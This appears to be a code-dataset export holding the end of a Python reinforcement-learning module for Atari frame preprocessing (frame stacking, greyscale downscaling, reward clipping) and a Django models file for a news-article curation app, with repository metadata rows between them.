    frame_size: 2 element tuple
        Height/width of a single frame.  Defaults to (84, 84), which was
        previously hard-coded; exposing it keeps this class in sync with
        AtariPreprocessor's configurable ``new_size``.
    """

    def __init__(self, history_length=3, frame_size=(84, 84)):
        self.history_length = history_length
        self.frame_size = frame_size
        # Template of all-zero frames used both at start-up and on reset.
        self.initial_list = [np.zeros(frame_size)] * history_length
        self.queue = deque(self.initial_list, maxlen=history_length)

    def process_state_for_network(self, state):
        """Return *state* stacked with its history, channels-last.

        You only want history when deciding the current action to take.
        The new state is recorded in the queue after the stack is built,
        so the result contains the k previous frames plus *state*.
        """
        all_states = list(self.queue) + [state]
        self.queue.append(state)
        stacked = np.array(all_states, dtype=np.float32)
        # (k+1, H, W) -> (H, W, k+1); single transpose replaces the
        # original pair of swapaxes calls (same permutation).
        return np.transpose(stacked, (1, 2, 0))

    def reset(self):
        """Reset the history sequence to all-zero frames.

        Useful when you start a new episode.
        """
        self.queue = deque(self.initial_list, maxlen=self.history_length)

    def get_config(self):
        return {'history_length': self.history_length}
class AtariPreprocessor(Preprocessor):
    """Converts images to greyscale and downscales.

    Based on the preprocessing step described in Mnih et al.,
    "Human-Level Control Through Deep Reinforcement Learning",
    Nature 518(7540):529-533, 2015.  doi:10.1038/nature14236

    You may also want to max over frames to remove flickering. Some
    games require this (based on animations and the limited sprite
    drawing capabilities of the original Atari).

    Parameters
    ----------
    new_size: 2 element tuple
        The size that each image in the state should be scaled to. e.g
        (84, 84) will make each image in the output have shape (84, 84).
    """

    def __init__(self, new_size):
        self.new_size = new_size

    def _scaled_grayscale(self, state, dtype):
        """Shared helper: RGB frame -> resized greyscale array of *dtype*.

        Factoring this out keeps the memory (uint8) and network (float32)
        paths identical except for the dtype.
        """
        im = Image.fromarray(state, 'RGB')
        im = im.convert('L')
        im = im.resize(self.new_size, Image.BILINEAR)
        # np.array(im) yields a (height, width) array.  The original
        # reshape used (width, height), which silently transposed the
        # frame for any non-square new_size; identical for square sizes.
        return np.array(im, dtype=dtype)

    def process_state_for_memory(self, state):
        """Scale, convert to greyscale and return uint8.

        We don't want to save floating point numbers in the replay
        memory: uint8 keeps the same resolution at a quarter to an
        eighth of the bytes.
        """
        return self._scaled_grayscale(state, np.uint8)

    def process_state_for_network(self, state):
        """Scale, convert to greyscale and return float32 for the network."""
        return self._scaled_grayscale(state, np.float32)

    def process_batch(self, samples):
        """Convert uint8 replay samples to float32.

        Both ``state`` and ``next_state`` are converted on each sample;
        the (mutated) samples are returned as a list.
        """
        processed_samples = []
        for sample in samples:
            sample.state = np.array(sample.state, dtype=np.float32)
            sample.next_state = np.array(sample.next_state, dtype=np.float32)
            processed_samples.append(sample)
        return processed_samples

    def process_reward(self, reward):
        """Clip reward to -1, 0 or 1 (the sign of the raw reward)."""
        if reward > 0:
            return 1
        if reward < 0:
            return -1
        return 0
class PreprocessorSequence(Preprocessor):
    """Chains an AtariPreprocessor with a HistoryPreprocessor.

    ``preprocessors`` must be a two-element sequence: the Atari (frame)
    preprocessor first and the history preprocessor second.  Calls are
    forwarded through them in that order, e.g.::

        state = atari.process_state_for_network(state)
        return history.process_state_for_network(state)
    """

    def __init__(self, preprocessors):
        # preprocessors: [AtariPreprocessor, HistoryPreprocessor]
        self.atari, self.history = preprocessors[0], preprocessors[1]

    def reset(self):
        # Only the history holds episode state worth clearing.
        self.history.reset()

    def process_state_for_network(self, state):
        frame = self.atari.process_state_for_network(state)
        return self.history.process_state_for_network(frame)

    def process_reward(self, reward):
        return self.atari.process_reward(reward)
"yangluonaluna@gmail.com"
] | yangluonaluna@gmail.com |
ad4a9ade81342bbd4739b4c548e4166cf5f70c76 | ddcbb3efa6dcf72e1e704bd811666721d966678c | /fuselage/models.py | 3035a7dcc58dea3e04c561c0326f235fa03c67c0 | [] | no_license | mattdeboard/planecrash | 20e402bb5ec506e0c140cdf95f11937b3f268659 | e6e86fa1866dba00e175aa9e4637f5aeaf098f65 | refs/heads/master | 2021-05-01T16:37:15.683734 | 2014-01-28T05:02:01 | 2014-01-28T05:02:01 | 16,116,943 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,196 | py | from django.db import models
from uuidfield import UUIDField
class ArticleManager(models.Manager):
def by_category(self, short_name, include_unprioritized=False):
"""Retrieve all the articles for a given category short name.
This differs from the standard
`filter(category__short_name='foo')` because it also limits the
number of results to the value of the `seats` property of the
category. If you don't need this limitation applied, just use
`filter(category__short_name='foo')`.
"""
category = Category.objects.get(short_name=short_name)
qs = super(ArticleManager, self).get_queryset()\
.select_related('category')\
.filter(category=category)\
.order_by('priority')
if not include_unprioritized:
qs = qs.exclude(priority=None)
return qs[:category.seats]
class Article(models.Model):
    """A curated news article assigned to a prioritized category."""

    # Stable external identifier, generated automatically.
    article_uid = UUIDField(auto=True)
    category = models.ForeignKey('Category', null=True)
    # NOTE(review): auto_now=True makes this field update on *every* save,
    # so this "created" timestamp behaves like a modified timestamp;
    # auto_now_add alone is likely what was intended -- confirm before
    # changing (requires a migration).
    created = models.DateTimeField(auto_now=True, auto_now_add=True)
    modified = models.DateTimeField(auto_now=True)
    # Editor-supplied replacement headline; display falls back to the
    # original (see __unicode__).
    new_headline = models.CharField(max_length=1000, null=True, blank=True)
    original_headline = models.CharField(max_length=1000)
    # Sort key within a category (ascending); None = not yet prioritized.
    priority = models.IntegerField(null=True, blank=True)
    url = models.URLField(max_length=2000, unique=True)

    objects = ArticleManager()

    class Meta:
        db_table = 'articles'

    def __repr__(self):
        return "<Article: uuid:%s>" % self.article_uid

    def __unicode__(self):
        # Python 2-style display name; prefers the rewritten headline.
        return self.new_headline or self.original_headline
class Category(models.Model):
    """A section of the site with a fixed number of article slots."""

    # Maximum number of articles returned for this category
    # (see ArticleManager.by_category).
    seats = models.IntegerField()
    title = models.CharField(max_length=20, db_index=True, unique=True)
    # Lookup key used by ArticleManager.by_category.
    short_name = models.CharField(max_length=20, db_index=True, unique=True)
    priority = models.IntegerField()

    class Meta:
        db_table = 'categories'
        verbose_name_plural = 'Categories'

    def __repr__(self):
        return "<Category: %s>" % self.title

    def __unicode__(self):
        return self.title
| [
"matt.deboard@gmail.com"
] | matt.deboard@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.